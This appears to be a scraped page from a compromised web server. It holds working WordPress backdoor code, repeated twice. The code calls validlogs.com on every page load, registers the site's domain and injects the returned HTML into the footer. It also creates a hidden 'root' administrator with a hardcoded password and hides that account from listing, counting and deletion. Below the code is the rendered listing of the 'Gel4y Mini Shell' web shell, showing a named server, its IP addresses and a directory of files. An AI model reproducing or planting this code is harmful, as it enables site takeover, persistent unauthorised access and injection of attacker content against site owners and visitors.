function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.25)
  • Path: ~/opt/saltstack/salt/run/Cryptodome/Cipher/
    Name Size Permission Action
    __pycache__ N/A drwxr-xr-x
    AES.py 9.345KB -rw-r--r--
    AES.pyi 1.354KB -rw-r--r--
    ARC2.py 6.861KB -rw-r--r--
    ARC2.pyi 0.959KB -rw-r--r--
    ARC4.py 5.047KB -rw-r--r--
    ARC4.pyi 0.421KB -rw-r--r--
    Blowfish.py 5.836KB -rw-r--r--
    Blowfish.pyi 0.994KB -rw-r--r--
    CAST.py 5.944KB -rw-r--r--
    CAST.pyi 0.96KB -rw-r--r--
    ChaCha20.py 10.502KB -rw-r--r--
    ChaCha20.pyi 0.744KB -rw-r--r--
    ChaCha20_Poly1305.py 11.29KB -rw-r--r--
    ChaCha20_Poly1305.pyi 1.043KB -rw-r--r--
    DES.py 5.823KB -rw-r--r--
    DES.pyi 0.94KB -rw-r--r--
    DES3.py 6.778KB -rw-r--r--
    DES3.pyi 1.009KB -rw-r--r--
    PKCS1_OAEP.py 8.672KB -rw-r--r--
    PKCS1_OAEP.pyi 1.155KB -rw-r--r--
    PKCS1_v1_5.py 7.792KB -rw-r--r--
    PKCS1_v1_5.pyi 0.558KB -rw-r--r--
    Salsa20.py 6.22KB -rw-r--r--
    Salsa20.pyi 0.727KB -rw-r--r--
    _ARC4.cpython-39-x86_64-linux-gnu.so 5.891KB -rw-r--r--
    _EKSBlowfish.py 5.095KB -rw-r--r--
    _EKSBlowfish.pyi 0.264KB -rw-r--r--
    _Salsa20.cpython-39-x86_64-linux-gnu.so 6.484KB -rw-r--r--
    __init__.py 2.82KB -rw-r--r--
    __init__.pyi 0KB -rw-r--r--
    _chacha20.cpython-39-x86_64-linux-gnu.so 8.711KB -rw-r--r--
    _mode_cbc.py 10.714KB -rw-r--r--
    _mode_cbc.pyi 0.675KB -rw-r--r--
    _mode_ccm.py 23.902KB -rw-r--r--
    _mode_ccm.pyi 1.563KB -rw-r--r--
    _mode_cfb.py 10.567KB -rw-r--r--
    _mode_cfb.pyi 0.714KB -rw-r--r--
    _mode_ctr.py 15.547KB -rw-r--r--
    _mode_ctr.pyi 0.785KB -rw-r--r--
    _mode_eax.py 14.202KB -rw-r--r--
    _mode_eax.pyi 1.509KB -rw-r--r--
    _mode_ecb.py 8.029KB -rw-r--r--
    _mode_ecb.pyi 0.582KB -rw-r--r--
    _mode_gcm.py 20.9KB -rw-r--r--
    _mode_gcm.pyi 1.505KB -rw-r--r--
    _mode_ocb.py 19.373KB -rw-r--r--
    _mode_ocb.pyi 1.202KB -rw-r--r--
    _mode_ofb.py 10.06KB -rw-r--r--
    _mode_ofb.pyi 0.679KB -rw-r--r--
    _mode_openpgp.py 6.896KB -rw-r--r--
    _mode_openpgp.pyi 0.543KB -rw-r--r--
    _mode_siv.py 13.764KB -rw-r--r--
    _mode_siv.pyi 1.231KB -rw-r--r--
    _raw_aes.cpython-39-x86_64-linux-gnu.so 23.813KB -rw-r--r--
    _raw_aesni.cpython-39-x86_64-linux-gnu.so 8.977KB -rw-r--r--
    _raw_arc2.cpython-39-x86_64-linux-gnu.so 8.172KB -rw-r--r--
    _raw_blowfish.cpython-39-x86_64-linux-gnu.so 11.102KB -rw-r--r--
    _raw_cast.cpython-39-x86_64-linux-gnu.so 17.109KB -rw-r--r--
    _raw_cbc.cpython-39-x86_64-linux-gnu.so 6.422KB -rw-r--r--
    _raw_cfb.cpython-39-x86_64-linux-gnu.so 6.508KB -rw-r--r--
    _raw_ctr.cpython-39-x86_64-linux-gnu.so 6.688KB -rw-r--r--
    _raw_des.cpython-39-x86_64-linux-gnu.so 41.508KB -rw-r--r--
    _raw_des3.cpython-39-x86_64-linux-gnu.so 41.789KB -rw-r--r--
    _raw_ecb.cpython-39-x86_64-linux-gnu.so 4.453KB -rw-r--r--
    _raw_eksblowfish.cpython-39-x86_64-linux-gnu.so 16.289KB -rw-r--r--
    _raw_ocb.cpython-39-x86_64-linux-gnu.so 8.875KB -rw-r--r--
    _raw_ofb.cpython-39-x86_64-linux-gnu.so 5.273KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet